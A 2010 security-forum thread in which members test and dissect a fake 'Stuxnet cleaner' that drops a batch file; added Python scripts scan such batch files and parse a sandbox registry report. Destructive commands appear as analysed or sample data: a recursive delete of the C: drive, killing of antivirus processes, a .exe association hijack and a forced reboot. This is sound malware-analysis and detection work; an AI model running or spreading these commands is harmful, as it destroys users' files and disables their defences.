Fake Stuxnet cleaner = very nasty

Discussion in 'malware problems & news' started by CloneRanger, Oct 10, 2010.

Thread Status:
Not open for further replies.
  1. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    It doesn't come much worse than this.

    stuxnet-cleaner.exe

    [attachment: sc.gif]

    [attachment: shell.gif]

    Originally Posted by a_d_13

    Of course not many people are going to change the extension from .exe to .bat and/or then run it :D But now the code is out there that means other idiots could make use of it, and release it as a .bat file. This could be delivered in the usual ways, and people tricked into running it, with possible devastating consequences :eek:

    I have .bat protection, so I'd get alerted and prompted ;) but I'm not sure how many others out there would be protected from running such a file, and then .....

    Would people be protected from this scenario ?

    If so how exactly ?
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    For me, the question isn't answerable w/o seeing an actual exploit and the way it attempts to trick the user into running it.

    ----
    rich
     
  3. stackz

    stackz Registered Member

    Joined:
    Dec 27, 2007
    Posts:
    646
    Location:
    Sydney Australia
    The stuxnet cleaner executable creates the file Stuxnet Cleaner.bat in
    *\Local Settings\Temp\1.tmp\Stuxnet Cleaner.bat, then executes the batch file.
    Simple and skiddy as that.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Tried it without any security. System unbootable.
    GesWall- Passed
    CIS Default settings with AV turned off- It gave a pop up and I opted to sandbox it. It deleted some start menu items, some jpg images from my desktop etc etc but the system remained intact, rebooted fine (it will however succeed in deleting some files from your PC).

    [attachments: 1.jpg, 2.jpg, 3.jpg]
     
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Well, I went to that forum to check it out, and agree with the second poster that it is a script kiddie thingy.

    Surely, no respectable cybercriminal would write such a piece of code.

    ----
    rich
     
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    I agree except with the word "respectable". :)
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I use that word in an ironic sense.

    My implication is that a respectable cybercriminal (respected in her/his profession; creditable; one committed to her/his work) wants to take over the computer for monetary gain, not to destroy it!


    ----
    rich
     
  8. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    OK ;)

    Script kiddie thingy indeed, I don't see the sense in releasing stuff like this. Well I guess they don't have any !

    @ stackz

    Hi, I searched for ALL temp files and didn't see it in *\Local Settings\Temp\1.tmp\Stuxnet Cleaner.bat ? Only as shown below. Did you test it, if so how ?

    Yes nasty :eek:

    Nice to see GesWall Passed :thumb: With CIS you were still alive :thumb: but some issues :( Thanks for testing :)

    *

    Well I ran it after enabling ShadowDefender & allowing it via ProcessGuard.

    Stuxnet-Cleaner.exe appeared in running processes.

    An E.tmp folder was created in Temp

    [attachment: e.gif]

    Inside there was this

    [attachment: scb.gif]

    Found a locked file tmp.edb in C:\WINDOWS\system32\CatRoot2

    [attachment: edb.gif]

    Found some info on tmp.edb -

    http://technet.microsoft.com/en-us/library/bb124808(EXCHG.65).aspx - which didn't seem relevant !

    W32/Archiles.worm - http://vil.nai.com/vil/content/v_141963.htm - Coincidence ?

    Not sure what that is right now ? but as it was created over 3 hours before I ran the test, I don't see how it's connected !

    Didn't notice anything unusual with Autoruns/RkU/Gmer

    Killed Stuxnet-Cleaner.exe with RkU, cut & pasted E.tmp/Stuxnet Cleaner.bat to a new folder excluded from deletion by SD, and rebooted. SD returned my comp to as before

    Obviously this malware is designed to do its nasty deeds on reboot, and I wasn't going to allow that, guess why :D But I wanted to see what I could find that it installed & ready to run on boot etc. I expect I maybe missed something/s ? as I don't see how that .bat could have autorun on boot from within that folder, without some other help !

    Edit

    virscan.org = Only BitDefender detected Stuxnet Cleaner.bat - BehavesLike:BAT.Delete (suspected)

     
    Last edited: Oct 11, 2010
  9. stackz

    stackz Registered Member

    Joined:
    Dec 27, 2007
    Posts:
    646
    Location:
    Sydney Australia
    I had a chance to have a closer look at this piece of rubbish. The batch file is embedded in the executable's resource file. It gets written to *\Local Settings\Temp\[Single Char].tmp\Stuxnet Cleaner.bat
    The batch file is deleted after execution.

    The batch file:
    Changes file association for .exe, .mp3, .jpg, .bmp and .gif.
    Deletes every file on C drive that it can.
    Kills explorer.exe, firefox.exe. iexplore.exe and avgnt.exe (avira)
    Reboots the computer - obviously if it gets this far, then the computer would be unbootable.

    The program appears to be of German origin.
     
  10. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Thanks for the nice analysis.
     
  11. Boyfriend

    Boyfriend Registered Member

    Joined:
    Jun 7, 2010
    Posts:
    1,070
    Location:
    Pakistan
    Thanks stackz for analysis :) It really seems work of script kiddy.
     
  12. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Re - \Local Settings\Temp\[Single Char].tmp\Stuxnet Cleaner.bat

    So the [Single Char] folder it creates appears to be a random one, as mine was E.tmp not 1.tmp.

    After running Stuxnet-Cleaner.exe,

    I was able to create a .gif file with no file association etc problems.

    It didn't delete ANY file on C drive.

    Didn't kill explorer.exe/firefox.exe/avgnt.exe and all were running.

    That's why I'm curious to find out how the batch file actually executes itself, after being created by running Stuxnet-Cleaner.exe. As it didn't happen on my comp, and Script Defender would have prompted me for permission to run a .bat file anyway, which it didn't.

    Also as I mentioned earlier, I'm wondering how many people out there would be protected, or not, from a .bat file auto running ? The person using W7 with big problems in the - www.trojaner-board.de - obviously had it run !

    @ stackz

    From post # 9, does that mean you ran it as i asked ?

    Or that you found the info elsewhere, if so where ?

    How does the batch file execute itself, and then do what it does ?

    TIA
     
  13. test

    test Registered Member

    Joined:
    Feb 15, 2010
    Posts:
    499
    Location:
    italy
    DefenseWall is also able to contain the effects of this malware..
     
    Last edited: Oct 11, 2010
  14. trjam

    trjam Registered Member

    Joined:
    Aug 18, 2006
    Posts:
    9,102
    Location:
    North Carolina USA
    Prevx stopped it.:thumb:
     
  15. Franklin

    Franklin Registered Member

    Joined:
    May 12, 2005
    Posts:
    2,517
    Location:
    West Aussie
    The fake stuxnet cleaner contains a line to wipe C drive so dunno why it needs to do anything else as that does enough damage in itself?

    Kernelmode Topic
     
  16. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    :thumb:

    Prevx didn't detect Anything when I did the test o_O and still does Not detect Stuxnet-Cleaner.exe or Stuxnet Cleaner.bat in my folder ?

    Which is very strange, considering your experience ?
     
  17. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    @ Franklin

    Hi, the thing is, as you can see from my test, it didn't cause ANY damage to my comp !
     
  18. stackz

    stackz Registered Member

    Joined:
    Dec 27, 2007
    Posts:
    646
    Location:
    Sydney Australia
    I've run it, unpacked it, debugged it etc
    Batch file is launched using ShellExecuteExA, which will mean cmd.exe runs the batch file.
    The executable resource manifest shows requestedExecutionLevel level="highestAvailable", which means in admin account it runs as admin or prompts for admin where UAC is involved, in LUA it will run as limited user.

    If the stuxnet cleaner runs successfully, the first thing you'll notice is that its icon changes to the WMA icon and cmd.exe is using a lot of cpu cycles.
    Code:
    @echo off
    assoc .exe=WMAFile // change file association
    assoc    <snip>
    assoc    <snip>
    assoc    <snip>
    assoc    <snip>
    del      <snip>  // recursive delete file command
    taskkill <snip>  // kill process
    taskkill <snip>
    taskkill <snip>
    taskkill <snip>
    shutdown -r -t 600 -c "Opfer" // reboots after 600 seconds, additional comment "Opfer" = victim
     
    Last edited: Oct 12, 2010
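Added example (not code from the thread, and not the file stackz analysed): a small Python triage script that scans a batch file for the command families his listing shows, ranked the way a responder would rank them: an assoc line that hijacks .exe, a recursive or drive-root delete, taskkill against a known AV process, and a delayed reboot. The embedded sample batch is constructed; only the `assoc .exe=WMAFile` and `shutdown` lines are quoted from the post, the other commands are stand-ins for the snipped lines and do not claim to reproduce them. The AV process list (`avgnt`) is the one name the thread mentions and is an assumption to extend.

```python
"""Static triage of a Windows batch file for the destructive command
families described in the thread.  Added example, not the analysed sample:
SAMPLE_BAT below is constructed; only the 'assoc .exe=WMAFile' and
'shutdown' lines are quoted from the post, the rest are stand-ins for the
<snip> lines and are NOT a reconstruction of them."""
import re
import sys
from typing import Dict, Iterator, List, Tuple

SAMPLE_BAT = r"""@echo off
assoc .exe=WMAFile
assoc .jpg=THEMEFile
del /f /s /q C:\*.*
taskkill /f /im explorer.exe
taskkill /f /im avgnt.exe
shutdown -r -t 600 -c "Opfer"
"""

# Assumption: 'avgnt' (Avira) is the only AV process the thread names;
# extend this tuple for your own environment.
AV_PROCESSES = ("avgnt",)

# Ordered most specific first; the first matching rule wins for a line.
RULES: List[Tuple[str, str, str]] = [
    ("assoc_hijack_exe",  r"^assoc\s+\.exe\s*=",                   "critical"),
    ("assoc_change",      r"^assoc\s+\.[a-z0-9]+\s*=",             "high"),
    ("recursive_delete",  r"^(del|erase|rd|rmdir)\b(?=.*\s/s\b)",  "critical"),
    ("delete_drive_root", r"^(del|erase)\b.*\s[a-z]:\\\*",         "critical"),
    ("kills_av",          r"^taskkill\b.*\b(" + "|".join(AV_PROCESSES) + r")(\.exe)?\b", "high"),
    ("taskkill",          r"^taskkill\b",                           "medium"),
    ("reboot",            r"^shutdown\b.*\s[-/]r\b",                "medium"),
]
COMPILED = [(name, re.compile(pat, re.I), sev) for name, pat, sev in RULES]


def batch_commands(text: str) -> Iterator[Tuple[int, str]]:
    """Yield (line number, command) for lines that execute; skip blanks and
    REM / :: comments, and drop a leading '@' echo suppressor."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("::") or line.lower().startswith("rem "):
            continue
        if line.startswith("@"):
            line = line[1:].lstrip()
        yield lineno, line


def scan_batch(text: str) -> List[Dict[str, object]]:
    """Return one finding per matching line: {line, rule, severity, command}."""
    findings: List[Dict[str, object]] = []
    for lineno, cmd in batch_commands(text):
        for name, rx, sev in COMPILED:
            if rx.search(cmd):
                findings.append({"line": lineno, "rule": name,
                                 "severity": sev, "command": cmd})
                break
    return findings


def verdict(findings: List[Dict[str, object]]) -> str:
    """Collapse findings to destructive / suspicious / nothing_found.
    'nothing_found' is not 'safe': obfuscated batch (variable expansion,
    call tricks, code built at runtime) escapes a line-level regex scan."""
    severities = {f["severity"] for f in findings}
    if "critical" in severities:
        return "destructive"
    if "high" in severities:
        return "suspicious"
    return "nothing_found"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_BAT
    found = scan_batch(text)
    for f in found:
        print(f"line {f['line']:>3} {f['severity']:<8} {f['rule']:<18} {f['command']}")
    print("verdict:", verdict(found))
```

Run it as `python scan_bat.py "Stuxnet Cleaner.bat"` on a copy of the extracted file, never on the .exe. The rules are deliberately line-level and stop at the first hit per line, so a file that only changes associations comes out "suspicious" while one with a recursive delete comes out "destructive". Treat "nothing_found" as exactly that: a batch that builds its commands from variables or `call`s into a second file will sail past this, which is why the posters above still detonated the sample under a sandbox or a shadowed disk.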
  19. Franklin

    Franklin Registered Member

    Joined:
    May 12, 2005
    Posts:
    2,517
    Location:
    West Aussie
    XP VM's - Sandboxie and Bufferzone both contain any changes to their secure zones.

    Returnil and Shadow Defender don't contain any changes realtime but things are back to normal after reboot.

    Line from Stuxnet-Cleaner.exe saved as "Delete System.bat" - 3/43 - Trojan.BAT.KillFiles.gc

    Stuxnet-Cleaner.exe - 19/42 - Trojan:Win32/Delfiles.Q

    BSA report via Sandboxie:

    [ General information ]
    * File name: c:\documents and settings\ven\desktop\stuxnet-cleaner.exe
    * File length: 75776 bytes
    * File signature: UPX [com] *
    * MD5 hash: 8fab1b7e5e11adaf4d57afeb652d7832
    * SHA1 hash: 16c8dd9b634248016930f81b3e7f66bfbef8e219
    * SHA256 hash: 872ea49751b04bf2ea1e07eeb96384f812b880bdb648bb1f4641b0cb0304723e

    Then proceeds to delete every file it can mainly those not in use.

    [ Changes to registry ]
    * Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.bmp
    old value "Default=Paint.Picture"
    * Modifies value "Default=WMAFile" in key HKEY_LOCAL_MACHINE\software\Classes\.exe
    old value "Default=exefile"
    * Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.gif
    old value "Default=giffile"
    * Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.jpg
    old value "Default=jpegfile"
    * Modifies value "Default=VBSFile" in key HKEY_LOCAL_MACHINE\software\Classes\.mp3
    old value "Default=mp3file"
    * Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

    [ Process/window information ]
    * Opens a service named "LanmanWorkstation".
    * Creates a mutex "ZonesCounterMutex".
    * Creates a mutex "ZonesCacheCounterMutex".
    * Creates a mutex "ZonesLockedCacheCounterMutex".
    * Creates process "(null),"C:\Documents and Settings\Ven\Local Settings\Temp\2.tmp\Stuxnet Cleaner.bat" ,C:\Documents and Settings\USER\Desktop\".
    * Creates a mutex "SHIMLIB_LOG_MUTEX".
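Added example, not part of Franklin's post and not the BSA tool's own code: a Python parser for the "[ Changes to registry ]" block of a BSA-style report as pasted above. It pulls out each modified value with its recorded old value, flags the ones that rewrite the default ProgID under ...\Classes\.ext (the association hijack stackz described, with .exe now pointing at WMAFile), and emits the reg.exe commands that put the recorded old defaults back. The embedded sample is the registry section quoted above, trimmed to four entries; the line format is assumed from that paste only.

```python
"""Parse the '[ Changes to registry ]' section of a BSA-style sandbox report,
flag file-association hijacks, and produce reg.exe rollback commands.
Added example; the report lines below are copied from the post above and
trimmed, and the report's line format is assumed from that paste only."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_REPORT = r"""[ General information ]
* File name: c:\documents and settings\ven\desktop\stuxnet-cleaner.exe

[ Changes to registry ]
* Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.bmp
old value "Default=Paint.Picture"
* Modifies value "Default=WMAFile" in key HKEY_LOCAL_MACHINE\software\Classes\.exe
old value "Default=exefile"
* Modifies value "Default=VBSFile" in key HKEY_LOCAL_MACHINE\software\Classes\.mp3
old value "Default=mp3file"
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

[ Process/window information ]
* Opens a service named "LanmanWorkstation".
"""


@dataclass
class RegChange:
    action: str                      # "modify" or "delete_key"
    key: str
    value_name: Optional[str] = None
    new: Optional[str] = None
    old: Optional[str] = None        # None when the report recorded no old state


MODIFY_RX = re.compile(r'^\* Modifies value "(?P<name>[^="]+)=(?P<new>[^"]*)" in key (?P<key>.+?)\s*$')
OLD_RX = re.compile(r'^old value "(?P<name>[^="]+)=(?P<old>[^"]*)"')
DELETE_RX = re.compile(r'^\* Deletes Registry key (?P<key>.+?)\s*$')
EXT_RX = re.compile(r'\\Classes\\(\.[A-Za-z0-9]+)$', re.I)


def parse_registry_section(report: str) -> List[RegChange]:
    """Return the changes listed under '[ Changes to registry ]', pairing each
    'Modifies value' line with the 'old value' line that follows it."""
    changes: List[RegChange] = []
    lines = report.splitlines()
    in_section = False
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        if line.startswith("[ ") and line.endswith(" ]"):
            in_section = (line == "[ Changes to registry ]")
        elif in_section:
            m = MODIFY_RX.match(line)
            if m:
                change = RegChange("modify", m["key"], m["name"], m["new"])
                if i + 1 < len(lines):
                    mo = OLD_RX.match(lines[i + 1].strip())
                    if mo and mo["name"] == m["name"]:
                        change.old = mo["old"]
                        i += 1           # consume the 'old value' line
                changes.append(change)
            else:
                d = DELETE_RX.match(line)
                if d:
                    changes.append(RegChange("delete_key", d["key"]))
        i += 1
    return changes


def association_hijacks(changes: List[RegChange]) -> List[Tuple[str, Optional[str], Optional[str]]]:
    """(extension, old ProgID, new ProgID) for every Default value rewritten
    under ...\Classes\.ext; '.exe' here means double-click no longer launches programs."""
    out = []
    for c in changes:
        if c.action == "modify" and c.value_name == "Default":
            m = EXT_RX.search(c.key)
            if m:
                out.append((m.group(1).lower(), c.old, c.new))
    return out


def restore_commands(changes: List[RegChange]) -> List[str]:
    """reg.exe lines that restore each recorded old value (/ve = the Default
    value).  A deleted key gets a REM only: the report does not say what it held."""
    cmds = []
    for c in changes:
        if c.action == "modify" and c.old is not None:
            target = "/ve" if c.value_name == "Default" else f'/v "{c.value_name}"'
            cmds.append(f'reg add "{c.key}" {target} /d "{c.old}" /f')
        elif c.action == "delete_key":
            cmds.append(f"REM key deleted, contents not recorded: {c.key}")
    return cmds


if __name__ == "__main__":
    parsed = parse_registry_section(SAMPLE_REPORT)
    for ext, old, new in association_hijacks(parsed):
        print(f"association hijack: {ext}  {old} -> {new}")
    print("\n".join(restore_commands(parsed)))
```

Two practical notes on using the output. Run the `reg add` lines from a cmd window that is already open: cmd starts reg.exe through CreateProcess, which ignores the .exe association, whereas double-clicking a .reg or .exe in Explorer goes through ShellExecute and will open it with the WMA handler while HKLM\...\Classes\.exe still says WMAFile. Check HKEY_CURRENT_USER\Software\Classes as well, since per-user entries there take precedence over the HKLM ones this report shows. The deleted `*\shell\sandbox` key is probably Sandboxie's own context-menu entry collected because the run was sandboxed, not something the batch file went after, so do not read it as malware behaviour without confirming it on a clean run.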
     
  20. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    @ stackz

    @ Franklin

    Thanks for the extra info etc, wish you'd posted it all earlier ;)

    Well they say, your mileage may vary, and it certainly did with me. Interesting how different malware affects people's comps, or not, in different ways !
     